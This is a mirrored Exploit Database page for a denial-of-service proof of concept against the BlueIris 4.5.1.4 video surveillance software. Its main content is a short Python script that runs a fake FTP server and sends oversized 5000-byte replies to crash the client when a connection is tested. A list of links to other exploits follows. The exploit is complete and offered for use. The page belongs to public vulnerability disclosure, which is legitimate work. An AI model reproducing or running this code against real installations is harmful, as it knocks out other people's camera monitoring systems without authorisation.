BlueIris 4.5.1.4 – Denial of Service

Exploit Database
75 阅读

作者： Peter Baris

日期： 2017-02-28
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/41474/

import socket


# Title: BlueIris - Denial of Service
# Date: 2017-02-28
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://blueirissoftware.com/blueiris.exe
# Version: 4.5.1.4
# Tested on: Windows Server 2008 R2 Standard x64


# Start this fake FTP server and create an FTP connection in the software. Use the "Test" button to trigger the vulnerability.

buffer = "A"*5000
port = 21
s = socket.socket()
ip = '0.0.0.0' 
s.bind((ip, port))
s.listen(5)

 
print 'Listening on FTP port: '+str(port)
 
while True:
	conn, addr = s.accept() 
	conn.send('220 '+buffer+'\r\n')
	conn.recv(1024)
	conn.send('250 '+buffer+'\r\n')
	conn.close()

last Exploits
BlueIris 4.5.1.4 – Denial of Service的更多信息

SpotFTP FTP Password Recovery 3.0.0.0 – ‘Name’ Denial of Service (PoC)：
Microsoft Windows – SMB Remote Code Execution Scanner (MS17-010) (Metasploit)：
Vino VNC Server 3.7.3 – Persistent Denial of Service：
Subtitle Translation Wizard 3.0.0 – Overflow (SEH) (PoC)：
Microsoft Windows – ‘ATMFD.DLL’ CFF table (ATMFD+0x34072 / ATMFD+0x3407b) Invalid Memory Access：
Apple Safari – ‘DateTimeFormat.format’ Type Confusion：
Huawei eSpace 1.1.11.103 – Image File Format Handling Buffer Overflow：
Product Key Explorer 4.2.0.0 – ‘Key’ Denial of Service (PoC)：